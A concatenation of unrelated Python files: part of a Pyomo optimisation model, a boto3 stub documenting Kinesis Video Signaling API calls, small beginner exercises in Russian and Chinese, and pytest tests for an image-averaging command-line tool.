m.b162 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b163 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b164 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b165 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b166 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b167 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b168 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b169 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b170 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b171 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b172 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b173 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b174 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b175 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b176 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b177 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b178 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b179 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b180 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b181 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b182 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b183 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b184 = Var(within=Binary,bounds=(0,1),initialize=0)
m.x185 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x186 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x187 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x188 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x189 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x190 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x191 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x192 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x193 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x194 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x195 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x196 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x197 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x198 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x199 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x200 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x201 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x202 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x203 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x204 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x205 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x206 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x207 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x208 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x209 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x210 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x211 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x212 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x213 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x214 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x215 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x216 = Var(within=Reals,bounds=(0,None),initialize=0)
m.obj = Objective(expr= 111.366069033018*m.b1 + 173.736682895127*m.b2 + 206.584137827711*m.b3 + 311.192639215759*m.b4
+ 391.096663187392*m.b5 + 412.724041015689*m.b6 + 362.90703724183*m.b7 + 412.238377551605*m.b8
+ 202.33239914492*m.b9 + 206.873035263351*m.b10 + 459.424203486646*m.b11
+ 436.382257935297*m.b12 + 595.212791352102*m.b13 + 554.589535228908*m.b14
+ 561.749361850176*m.b15 + 581.529277658138*m.b16 + 530.881632918085*m.b17
+ 536.948983658504*m.b18 + 325.467953593857*m.b19 + 315.525067375426*m.b20
+ 76.225942040435*m.b21 + 254.905793105451*m.b22 + 113.004738070171*m.b23
+ 177.189040572114*m.b24 + 173.894920684095*m.b25 + 152.600290074966*m.b26
+ 204.409857240935*m.b27 + 16.5055441265287*m.b28 + 138.719762707452*m.b29
+ 72.1288414712326*m.b30 + 120.847015325226*m.b31 + 99.571165171974*m.b32
+ 151.849080781614*m.b33 + 145.681002740026*m.b34 + 319.104683215451*m.b35
+ 286.753801045421*m.b36 + 393.925160475677*m.b37 + 359.934057246776*m.b38
+ 372.757367428863*m.b39 + 380.320704273821*m.b40 + 209.897358368756*m.b41
+ 176.903014825797*m.b42 + 484.441224042163*m.b43 + 386.398700662687*m.b44
+ 569.816540558016*m.b45 + 500.146929279378*m.b46 + 536.081866783575*m.b47
+ 538.164119624621*m.b48 + 472.75417976903*m.b49 + 394.671861667082*m.b50
+ 661.778650400896*m.b51 + 311.233594837076*m.b52 + 537.233382862136*m.b53
+ 352.610164566948*m.b54 + 508.430479292237*m.b55 + 433.246268236365*m.b56
+ 240.434688571414*m.b57 + 247.573379889676*m.b58 + 140.125745864737*m.b59
+ 129.619586841229*m.b60 + 95.259779915922*m.b61 + 157.318586867059*m.b62
+ 70.3512639139942*m.b63 + 129.990055093272*m.b64 + 243.357134921591*m.b65
+ 304.003791259259*m.b66 + 387.22826595551*m.b67 + 513.078195638243*m.b68
+ 616.876803085642*m.b69 + 635.234357536375*m.b70 + 584.514585206566*m.b71
+ 639.355553242285*m.b72 + 471.729855743646*m.b73 + 557.923885983252*m.b74
+ 106.468143550206*m.b75 + 576.327451798806*m.b76 + 526.167479727853*m.b77
+ 684.640492332848*m.b78 + 496.847481320222*m.b79 + 632.720138765642*m.b80
+ 349.132941483343*m.b81 + 328.586110112758*m.b82 + 615.607044330971*m.b83
+ 537.140113127724*m.b84 + 717.322415523131*m.b85 + 647.481188136546*m.b86
+ 684.12778533852*m.b87 + 686.401242893627*m.b88 + 506.816284666641*m.b89
+ 398.035848133399*m.b90 + 855.431776792172*m.b91 + 471.606942587939*m.b92
+ 801.214873020304*m.b93 + 596.722224078614*m.b94 + 753.768882151975*m.b95
+ 691.333659314473*m.b96 + 85.3675502274446*m.b97 + 158.379394593169*m.b98
+ 257.300026361108*m.b99 + 320.704543355031*m.b100 + 448.126320657674*m.b101
+ 457.763772256702*m.b102 + 408.83386135894*m.b103 + 463.255868286668*m.b104
+ 237.144352702819*m.b105 + 177.481389098916*m.b106 + 528.418902427793*m.b107
+ 367.481249017807*m.b108 + 581.69455257316*m.b109 + 486.218458446561*m.b110
+ 545.202814571382*m.b111 + 534.842653535173*m.b112 + 273.315651326331*m.b113
+ 294.736877404174*m.b114 + 91.5634612712189*m.b115 + 207.431742416254*m.b116
+ 131.445214576321*m.b117 + 232.45283126314*m.b118 + 119.004267377741*m.b119
+ 195.036716336294*m.b120 + 382.803613122328*m.b121 + 467.001607601617*m.b122
+ 186.213458590968*m.b123 + 547.081668156355*m.b124 + 541.160249117729*m.b125
+ 656.49566392312*m.b126 + 512.884098066802*m.b127 + 621.549425681682*m.b128
+ 181.371452020713*m.b129 + 175.492124453316*m.b130 + 162.248252595624*m.b131
+ 55.0280789945633*m.b132 + 114.798088119326*m.b133 + 107.382697687723*m.b134
+ 90.3342797608636*m.b135 + 106.314336443356*m.b136 + 221.180367269329*m.b137
+ 200.830918650843*m.b138 + 420.854797821172*m.b139 + 351.4013073243*m.b140
+ 486.967847106279*m.b141 + 432.551908850222*m.b142 + 462.429481904519*m.b143
+ 462.157040602356*m.b144 + 181.09388190356*m.b145 + 223.750754907429*m.b146
+ 118.11570891131*m.b147 + 279.735432351987*m.b148 + 287.185185564983*m.b149
+ 336.883342353846*m.b150 + 272.594688961982*m.b151 + 322.770119748047*m.b152
+ 326.795248361408*m.b153 + 271.173036007453*m.b154 + 758.353052369709*m.b155
+ 597.043789091874*m.b156 + 887.286114762329*m.b157 + 775.415492640821*m.b158
+ 834.258761011951*m.b159 + 836.015790081594*m.b160 + 333.50853775*m.b161
+ 114.488510347914*m.b162 + 71.1466014342705*m.b163 + 327.61554475*m.b164
+ 115.456652447649*m.b165 + 72.6961052063678*m.b166 + 418.975572*m.b167
+ 144.050104531568*m.b168 + 89.5861361571157*m.b169 + 441.6481805*m.b170
+ 147.751509681552*m.b171 + 90.6409148587658*m.b172 + 284.85345325*m.b173
+ 109.929987849219*m.b174 + 72.4317650925971*m.b175 + 364.98681475*m.b176
+ 131.410153066893*m.b177 + 83.6314997177532*m.b178 + 261.83219775*m.b179
+ 103.183186592188*m.b180 + 68.7017117455899*m.b181 + 481.55377575*m.b182
+ 144.356933487536*m.b183 + 83.8297118343163*m.b184 + 88728.6114762329*m.x185
+ 88728.6114762329*m.x186 + 88728.6114762329*m.x187 + 88728.6114762329*m.x188
+ 88728.6114762329*m.x189 + 88728.6114762329*m.x190 + 88728.6114762329*m.x191
+ 88728.6114762329*m.x192, sense=minimize)
m.c2 = Constraint(expr= 0.818476132*m.b1 + 0.870157536*m.b9 + 1.031851452*m.b17 + 0.557538685*m.b25
+ 0.547431463*m.b33 + 0.875695399*m.b41 + 1.084580786*m.b49 + 0.730328391*m.b57
+ 0.942474488*m.b65 + 1.428565416*m.b73 + 0.86023025*m.b81 + 1.427064072*m.b89
+ 1.077855852*m.b97 + 0.966432495*m.b105 + 0.749586417*m.b113 + 1.20475136*m.b121
+ 0.637168473*m.b129 + 0.637828387*m.b137 + 0.578555855*m.b145 + 1.377981994*m.b153
- 1.68639324125*m.x193 - 3.3727864825*m.x194 - 5.05917972375*m.x195 == 0)
m.c3 = Constraint(expr= 0.818476132*m.b2 + 0.870157536*m.b10 + 1.031851452*m.b18 + 0.557538685*m.b26
+ 0.547431463*m.b34 + 0.875695399*m.b42 + 1.084580786*m.b50 + 0.730328391*m.b58
+ 0.942474488*m.b66 + 1.428565416*m.b74 + 0.86023025*m.b82 + 1.427064072*m.b90
+ 1.077855852*m.b98 + 0.966432495*m.b106 + 0.749586417*m.b114 + 1.20475136*m.b122
+ 0.637168473*m.b130 + 0.637828387*m.b138 + 0.578555855*m.b146 + 1.377981994*m.b154
- 1.792318871875*m.x196 - 3.58463774375*m.x197 - 5.376956615625*m.x198 == 0)
m.c4 = Constraint(expr= 0.818476132*m.b3 + 0.870157536*m.b11 + 1.031851452*m.b19 + 0.557538685*m.b27
+ 0.547431463*m.b35 + 0.875695399*m.b43 + 1.084580786*m.b51 + 0.730328391*m.b59
+ 0.942474488*m.b67 + 1.428565416*m.b75 + 0.86023025*m.b83 + 1.427064072*m.b91
+ 1.077855852*m.b99 + 0.966432495*m.b107 + 0.749586417*m.b115 + 1.20475136*m.b123
+ 0.637168473*m.b131 + 0.637828387*m.b139 + 0.578555855*m.b147 + 1.377981994*m.b155
- 2.128386030625*m.x199 - 4.25677206125*m.x200 - 6.385158091875*m.x201 == 0)
m.c5 = Constraint(expr= 0.818476132*m.b4 + 0.870157536*m.b12 + 1.031851452*m.b20 + 0.557538685*m.b28
+ 0.547431463*m.b36 + 0.875695399*m.b44 + 1.084580786*m.b52 + 0.730328391*m.b60
+ 0.942474488*m.b68 + 1.428565416*m.b76 + 0.86023025*m.b84 + 1.427064072*m.b92
+ 1.077855852*m.b100 + 0.966432495*m.b108 + 0.749586417*m.b116 + 1.20475136*m.b124
+ 0.637168473*m.b132 + 0.637828387*m.b140 + 0.578555855*m.b148 + 1.377981994*m.b156
- 2.066948260625*m.x202 - 4.13389652125*m.x203 - 6.200844781875*m.x204 == 0)
m.c6 = Constraint(expr= 0.818476132*m.b5 + 0.870157536*m.b13 + 1.031851452*m.b21 + 0.557538685*m.b29
+ 0.547431463*m.b37 + 0.875695399*m.b45 + 1.084580786*m.b53 + 0.730328391*m.b61
+ 0.942474488*m.b69 + 1.428565416*m.b77 + 0.86023025*m.b85 + 1.427064072*m.b93
+ 1.077855852*m.b101 + 0.966432495*m.b109 + 0.749586417*m.b117 + 1.20475136*m.b125
+ 0.637168473*m.b133 + 0.637828387*m.b141 + 0.578555855*m.b149 + 1.377981994*m.b157
- 2.04641702*m.x205 - 4.09283404*m.x206 - 6.13925106*m.x207 == 0)
m.c7 = Constraint(expr= 0.818476132*m.b6 + 0.870157536*m.b14 + 1.031851452*m.b22 + 0.557538685*m.b30
+ 0.547431463*m.b38 + 0.875695399*m.b46 + 1.084580786*m.b54 + 0.730328391*m.b62
+ 0.942474488*m.b70 + 1.428565416*m.b78 + 0.86023025*m.b86 + 1.427064072*m.b94
+ 1.077855852*m.b102 + 0.966432495*m.b110 + 0.749586417*m.b118 + 1.20475136*m.b126
+ 0.637168473*m.b134 + 0.637828387*m.b142 + 0.578555855*m.b150 + 1.377981994*m.b158
- 2.129217781875*m.x208 - 4.25843556375*m.x209 - 6.387653345625*m.x210 == 0)
m.c8 = Constraint(expr= 0.818476132*m.b7 + 0.870157536*m.b15 + 1.031851452*m.b23 + 0.557538685*m.b31
+ 0.547431463*m.b39 + 0.875695399*m.b47 + 1.084580786*m.b55 + 0.730328391*m.b63
+ 0.942474488*m.b71 + 1.428565416*m.b79 + 0.86023025*m.b87 + 1.427064072*m.b95
+ 1.077855852*m.b103 + 0.966432495*m.b111 + 0.749586417*m.b119 + 1.20475136*m.b127
+ 0.637168473*m.b135 + 0.637828387*m.b143 + 0.578555855*m.b151 + 1.377981994*m.b159
- 2.002947450625*m.x211 - 4.00589490125*m.x212 - 6.008842351875*m.x213 == 0)
m.c9 = Constraint(expr= 0.818476132*m.b8 + 0.870157536*m.b16 + 1.031851452*m.b24 + 0.557538685*m.b32
+ 0.547431463*m.b40 + 0.875695399*m.b48 + 1.084580786*m.b56 + 0.730328391*m.b64
+ 0.942474488*m.b72 + 1.428565416*m.b80 + 0.86023025*m.b88 + 1.427064072*m.b96
+ 1.077855852*m.b104 + 0.966432495*m.b112 + 0.749586417*m.b120 + 1.20475136*m.b128
+ 0.637168473*m.b136 + 0.637828387*m.b144 + 0.578555855*m.b152 + 1.377981994*m.b160
- 1.62146898*m.x214 - 3.24293796*m.x215 - 4.86440694*m.x216 == 0)
m.c10 = Constraint(expr= m.b1 + m.b2 + m.b3 + m.b4 + m.b5 + m.b6 + m.b7 + m.b8 == 1)
m.c11 = Constraint(expr= m.b9 + m.b10 + m.b11 + m.b12 + m.b13 + m.b14 + m.b15 + m.b16 == 1)
m.c12 = Constraint(expr= m.b17 + m.b18 + m.b19 + m.b20 + m.b21 + m.b22 + m.b23 + m.b24 == 1)
m.c13 = Constraint(expr= m.b25 + m.b26 + m.b27 + m.b28 + m.b29 + m.b30 + m.b31 + m.b32 == 1)
m.c14 = Constraint(expr= m.b33 + m.b34 + m.b35 + m.b36 + m.b37 + m.b38 + m.b39 + m.b40 == 1)
m.c15 = Constraint(expr= m.b41 + m.b42 + m.b43 + m.b44 + m.b45 + m.b46 + m.b47 + m.b48 == 1)
m.c16 = Constraint(expr= m.b49 + m.b50 + m.b51 + m.b52 + m.b53 + m.b54 + m.b55 + m.b56 == 1)
m.c17 = Constraint(expr= m.b57 + m.b58 + m.b59 + m.b60 + m.b61 + m.b62 + m.b63 + m.b64 == 1)
m.c18 = Constraint(expr= m.b65 + m.b66 + m.b67 + m.b68 + m.b69 + m.b70 + m.b71 + m.b72 == 1)
m.c19 = Constraint(expr= m.b73 + m.b74 + m.b75 + m.b76 + m.b77 + m.b78 + m.b79 + m.b80 == 1)
m.c20 = Constraint(expr= m.b81 + m.b82 + m.b83 + m.b84 + m.b85 + m.b86 + m.b87 + m.b88 == 1)
m.c21 = Constraint(expr= m.b89 + m.b90 + m.b91 + m.b92 + m.b93 + m.b94 + m.b95 + m.b96 == 1)
m.c22 = Constraint(expr= m.b97 + m.b98 + m.b99 + m.b100 + m.b101 + m.b102 + m.b103 + m.b104 == 1)
m.c23 = Constraint(expr= m.b105 + m.b106 + m.b107 + m.b108 + m.b109 + m.b110 + m.b111 + m.b112 == 1)
m.c24 = Constraint(expr= m.b113 + m.b114 + m.b115 + m.b116 + m.b117 + m.b118 + m.b119 + m.b120 == 1)
m.c25 = Constraint(expr= m.b121 + m.b122 + m.b123 + m.b124 + m.b125 + m.b126 + m.b127 + m.b128 == 1)
m.c26 = Constraint(expr= m.b129 + m.b130 + m.b131 + m.b132 + m.b133 + m.b134 + m.b135 + m.b136 == 1)
m.c27 = Constraint(expr= m.b137 + m.b138 + m.b139 + m.b140 + m.b141 + m.b142 + m.b143 + m.b144 == 1)
m.c28 = Constraint(expr= m.b145 + m.b146 + m.b147 + m.b148 + m.b149 + m.b150 + m.b151 + m.b152 == 1)
m.c29 = Constraint(expr= m.b153 + m.b154 + m.b155 + m.b156 + m.b157 + m.b158 + m.b159 + m.b160 == 1)
m.c30 = Constraint(expr= m.b161 + m.b162 + m.b163 <= 1)
m.c31 = Constraint(expr= m.b164 + m.b165 + m.b166 <= 1)
m.c32 = Constraint(expr= m.b167 + m.b168 + m.b169 <= 1)
m.c33 = Constraint(expr= m.b170 + m.b171 + m.b172 <= 1)
m.c34 = Constraint(expr= m.b173 + m.b174 + m.b175 <= 1)
m.c35 = Constraint(expr= m.b176 + m.b177 + m.b178 <= 1)
m.c36 = Constraint(expr= m.b179 + m.b180 + m.b181 <= 1)
m.c37 = Constraint(expr= m.b182 + m.b183 + m.b184 <= 1)
m.c38 = Constraint(expr= - m.b161 + m.x193 <= 0)
m.c39 = Constraint(expr= - m.b162 + m.x194 <= 0)
m.c40 = Constraint(expr= - m.b163 + m.x195 <= 0)
m.c41 = Constraint(expr= - m.b164 + m.x196 <= 0)
m.c42 = Constraint(expr= - m.b165 + m.x197 <= 0)
m.c43 = Constraint(expr= - m.b166 + m.x198 <= 0)
m.c44 = Constraint(expr= - m.b167 + m.x199 <= 0)
m.c45 = Constraint(expr= - m.b168 + m.x200 <= 0)
m.c46 = Constraint(expr= - m.b169 + m.x201 <= 0)
m.c47 = Constraint(expr= - m.b170 + m.x202 <= 0)
m.c48 = Constraint(expr= - m.b171 + m.x203 <= 0)
m.c49 = Constraint(expr= - m.b172 + m.x204 <= 0)
m.c50 = Constraint(expr= - m.b173 + m.x205 <= 0)
m.c51 = Constraint(expr= - m.b174 + m.x206 <= 0)
m.c52 = Constraint(expr= - m.b175 + m.x207 <= 0)
m.c53 = Constraint(expr= - m.b176 + m.x208 <= 0)
m.c54 = Constraint(expr= - m.b177 + m.x209 <= 0)
m.c55 = Constraint(expr= - m.b178 + m.x210 <= 0)
m.c56 = Constraint(expr= - m.b179 + m.x211 <= 0)
m.c57 = Constraint(expr= - m.b180 + m.x212 <= 0)
m.c58 = Constraint(expr= - m.b181 + m.x213 <= 0)
m.c59 = Constraint(expr= - m.b182 + m.x214 <= 0)
m.c60 = Constraint(expr= - m.b183 + m.x215 <= 0)
m.c61 = Constraint(expr= - m.b184 + m.x216 <= 0)
m.c62 = Constraint(expr=-m.x185/(1 + m.x185) + m.x193 <= 0)
m.c63 = Constraint(expr=-m.x185/(1 + m.x185) + m.x194 <= 0)
m.c64 = Constraint(expr=-m.x185/(1 + m.x185) + m.x195 <= 0)
m.c65 = Constraint(expr=-m.x186/(1 + m.x186) + m.x196 <= 0)
m.c66 = Constraint(expr=-m.x186/(1 + m.x186) + m.x197 <= 0)
m.c67 = Constraint(expr=-m.x186/(1 + m.x186) + m.x198 <= 0)
m.c68 = Constraint(expr=-m.x187/(1 + m.x187) + m.x199 <= 0)
m.c69 = Constraint(expr=-m.x187/(1 + m.x187) + m.x200 <= 0)
m.c70 = Constraint(expr=-m.x187/(1 + m.x187) + m.x201 <= 0)
m.c71 = Constraint(expr=-m.x188/(1 + m.x188) + m.x202 <= 0)
m.c72 = Constraint(expr=-m.x188/(1 + m.x188) + m.x203 <= 0)
m.c73 = Constraint(expr=-m.x188/(1 + m.x188) + m.x204 <= 0)
m.c74 = Constraint(expr=-m.x189/(1 + m.x189) + m.x205 <= 0)
m.c75 = Constraint(expr=-m.x189/(1 + m.x189) + m.x206 <= 0)
m.c76 = Constraint(expr=-m.x189/(1 + m.x189) + m.x207 <= 0)
m.c77 = Constraint(expr=-m.x190/(1 + m.x190) + m.x208 <= 0)
m.c78 = Constraint(expr=-m.x190/(1 + m.x190) + m.x209 <= 0)
m.c79 = Constraint(expr=-m.x190/(1 + m.x190) + m.x210 <= 0)
m.c80 = Constraint(expr=-m.x191/(1 + m.x191) + m.x211 <= 0)
m.c81 = Constraint(expr=-m.x191/(1 + m.x191) + m.x212 <= 0)
m.c82 = Constraint(expr=-m.x191/(1 + m.x191) + m.x213 <= 0)
m.c83 = Constraint(expr=-m.x192/(1 + m.x192) + m.x214 <= 0)
m.c84 = Constraint(expr=-m.x192/(1 + m.x192) + m.x215 <= 0)
m.c85 = Constraint(expr=-m.x192/(1 + m.x192) + m.x216 <= 0)
|
'''
The MIT License (MIT)
Copyright (c) 2016 WavyCloud
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
def can_paginate(operation_name=None):
"""
Check if an operation can be paginated.
:type operation_name: string
:param operation_name: The operation name. This is the same name\nas the method name on the client. For example, if the\nmethod name is create_foo, and you\'d normally invoke the\noperation as client.create_foo(**kwargs), if the\ncreate_foo operation can be paginated, you can use the\ncall client.get_paginator('create_foo').
"""
pass
def generate_presigned_url(ClientMethod=None, Params=None, ExpiresIn=None, HttpMethod=None):
"""
Generate a presigned url given a client, its method, and arguments
:type ClientMethod: string
:param ClientMethod: The client method to presign for
:type Params: dict
:param Params: The parameters normally passed to\nClientMethod.
:type ExpiresIn: int
:param ExpiresIn: The number of seconds the presigned url is valid\nfor. By default it expires in an hour (3600 seconds)
:type HttpMethod: string
:param HttpMethod: The http method to use on the generated url. By\ndefault, the http method is whatever is used in the method\'s model.
"""
pass
def get_ice_server_config(ChannelARN=None, ClientId=None, Service=None, Username=None):
"""
Gets the Interactive Connectivity Establishment (ICE) server configuration information, including URIs, username, and password which can be used to configure the WebRTC connection. The ICE component uses this configuration information to setup the WebRTC connection, including authenticating with the Traversal Using Relays around NAT (TURN) relay server.
TURN is a protocol that is used to improve the connectivity of peer-to-peer applications. By providing a cloud-based relay service, TURN ensures that a connection can be established even when one or more peers are incapable of a direct peer-to-peer connection. For more information, see A REST API For Access To TURN Services .
You can invoke this API to establish a fallback mechanism in case either of the peers is unable to establish a direct peer-to-peer connection over a signaling channel. You must specify either a signaling channel ARN or the client ID in order to invoke this API.
See also: AWS API Documentation
Exceptions
:example: response = client.get_ice_server_config(
ChannelARN='string',
ClientId='string',
Service='TURN',
Username='string'
)
:type ChannelARN: string
:param ChannelARN: [REQUIRED]\nThe ARN of the signaling channel to be used for the peer-to-peer connection between configured peers.\n
:type ClientId: string
:param ClientId: Unique identifier for the viewer. Must be unique within the signaling channel.
:type Service: string
:param Service: Specifies the desired service. Currently, TURN is the only valid value.
:type Username: string
:param Username: An optional user ID to be associated with the credentials.
:rtype: dict
ReturnsResponse Syntax
{
'IceServerList': [
{
'Uris': [
'string',
],
'Username': 'string',
'Password': 'string',
'Ttl': 123
},
]
}
Response Structure
(dict) --
IceServerList (list) --
The list of ICE server information objects.
(dict) --
A structure for the ICE server connection data.
Uris (list) --
An array of URIs, in the form specified in the I-D.petithuguenin-behave-turn-uris spec. These URIs provide the different addresses and/or protocols that can be used to reach the TURN server.
(string) --
Username (string) --
A username to login to the ICE server.
Password (string) --
A password to login to the ICE server.
Ttl (integer) --
The period of time, in seconds, during which the username and password are valid.
Exceptions
KinesisVideoSignalingChannels.Client.exceptions.InvalidClientException
KinesisVideoSignalingChannels.Client.exceptions.SessionExpiredException
KinesisVideoSignalingChannels.Client.exceptions.ClientLimitExceededException
KinesisVideoSignalingChannels.Client.exceptions.ResourceNotFoundException
KinesisVideoSignalingChannels.Client.exceptions.InvalidArgumentException
KinesisVideoSignalingChannels.Client.exceptions.NotAuthorizedException
:return: {
'IceServerList': [
{
'Uris': [
'string',
],
'Username': 'string',
'Password': 'string',
'Ttl': 123
},
]
}
:returns:
(string) --
"""
pass
def get_paginator(operation_name=None):
"""
Create a paginator for an operation.
:type operation_name: string
:param operation_name: The operation name. This is the same name\nas the method name on the client. For example, if the\nmethod name is create_foo, and you\'d normally invoke the\noperation as client.create_foo(**kwargs), if the\ncreate_foo operation can be paginated, you can use the\ncall client.get_paginator('create_foo').
:rtype: L{botocore.paginate.Paginator}
ReturnsA paginator object.
"""
pass
def get_waiter(waiter_name=None):
"""
Returns an object that can wait for some condition.
:type waiter_name: str
:param waiter_name: The name of the waiter to get. See the waiters\nsection of the service docs for a list of available waiters.
:rtype: botocore.waiter.Waiter
"""
pass
def send_alexa_offer_to_master(ChannelARN=None, SenderClientId=None, MessagePayload=None):
"""
This API allows you to connect WebRTC-enabled devices with Alexa display devices. When invoked, it sends the Alexa Session Description Protocol (SDP) offer to the master peer. The offer is delivered as soon as the master is connected to the specified signaling channel. This API returns the SDP answer from the connected master. If the master is not connected to the signaling channel, redelivery requests are made until the message expires.
See also: AWS API Documentation
Exceptions
:example: response = client.send_alexa_offer_to_master(
ChannelARN='string',
SenderClientId='string',
MessagePayload='string'
)
:type ChannelARN: string
:param ChannelARN: [REQUIRED]\nThe ARN of the signaling channel by which Alexa and the master peer communicate.\n
:type SenderClientId: string
:param SenderClientId: [REQUIRED]\nThe unique identifier for the sender client.\n
:type MessagePayload: string
:param MessagePayload: [REQUIRED]\nThe base64-encoded SDP offer content.\n
:rtype: dict
ReturnsResponse Syntax
{
'Answer': 'string'
}
Response Structure
(dict) --
Answer (string) --
The base64-encoded SDP answer content.
Exceptions
KinesisVideoSignalingChannels.Client.exceptions.ClientLimitExceededException
KinesisVideoSignalingChannels.Client.exceptions.ResourceNotFoundException
KinesisVideoSignalingChannels.Client.exceptions.InvalidArgumentException
KinesisVideoSignalingChannels.Client.exceptions.NotAuthorizedException
:return: {
'Answer': 'string'
}
:returns:
KinesisVideoSignalingChannels.Client.exceptions.ClientLimitExceededException
KinesisVideoSignalingChannels.Client.exceptions.ResourceNotFoundException
KinesisVideoSignalingChannels.Client.exceptions.InvalidArgumentException
KinesisVideoSignalingChannels.Client.exceptions.NotAuthorizedException
"""
pass
|
"""
Написать функцию month_to_season(), которая принимает 1 аргумент - номер месяца - и возвращает название сезона,
к которому относится этот месяц. Например, передаем 2, на выходе получаем "Winter".
"""
def month_to_season(month):
seasons = {
"winter": [1, 2, 12],
"spring": [3, 4, 5],
"summer": [6, 7, 8],
"autumn": [9, 10, 11],
}
for season, months in seasons.items():
if month in months:
return season
print(month_to_season(2))
|
import os
import sys
import tempfile
from pathlib import Path
from subprocess import Popen, PIPE
from average_pixels.version import __version__
# Extract it from setup.py?
TOOL = 'average-pixels'
IMAGES_DIR = 'images'
def run_tool(args):
p = Popen(args, stdout=PIPE, stderr=PIPE)
stdout, stderr = (out.decode('utf-8') for out in p.communicate())
return p, stdout, stderr
def get_images_dir():
return str(Path(sys.path[0]).parent / IMAGES_DIR)
def test_fails_with_help_no_args():
p, stdout, stderr = run_tool(TOOL)
assert p.returncode == 2
assert 'usage:' in stderr.lower()
def test_fails_with_help_when_running_mode_no_args():
for mode in ['download', 'local']:
p, stdout, stderr = run_tool([TOOL, mode])
assert p.returncode == 2
assert 'usage:' in stderr.lower()
def test_fails_when_dir_inexistent():
f = tempfile.TemporaryDirectory()
os.rmdir(f.name)
p, stdout, stderr = run_tool([TOOL, 'local', f.name])
assert p.returncode == 1
assert 'not found' in stderr.lower()
def test_fails_when_dir_has_no_images():
f = tempfile.TemporaryDirectory()
p, stdout, stderr = run_tool([TOOL, 'local', f.name])
assert p.returncode == 1
assert 'no images' in stderr.lower()
os.rmdir(f.name)
def test_fails_when_dir_is_a_file():
f = tempfile.NamedTemporaryFile()
p, stdout, stderr = run_tool([TOOL, 'local', f.name])
assert p.returncode == 1
assert 'not a directory' in stderr.lower()
os.unlink(f.name)
def test_version_displays_correctly():
p, stdout, stderr = run_tool([TOOL, '--version'])
assert p.returncode == 0
assert __version__ in stdout
def test_output_filename_igores_user_extension():
p, stdout, stderr = run_tool(
[TOOL, 'local', get_images_dir(), '--output', 'filename.ext'])
assert 'ext' not in stdout
def test_output_filename_adds_jpg():
p, stdout, stderr = run_tool(
[TOOL, 'local', get_images_dir(), '--output', 'filename.ext'])
assert 'jpg' in stdout
|
"""
Python 字典测试
"""
dict = {'name':'goujinping','age':'21','sex':'man','school':'NEFU'}
print(dict)
print(dict['age']) #通过键访问相应的值
print(dict['name'])
for key in dict.keys(): #访问字典的键 dict2.keys(),返回一个列表
print(key)
for value in dict.values(): #访问字典的值 dict2.values(), 返回一个列表
print(value)
del dict['sex'] #删除字典元素和字典
print(dict)
del dict
print(dict)
|
#Copyright (C) 2021 Fanwei Kong, Shawn C. Shadden, University of California, Berkeley
#Licensed under the Apache License, Version 2.0 (the "License");
#you may not use this file except in compliance with the License.
#You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#Unless required by applicable law or agreed to in writing, software
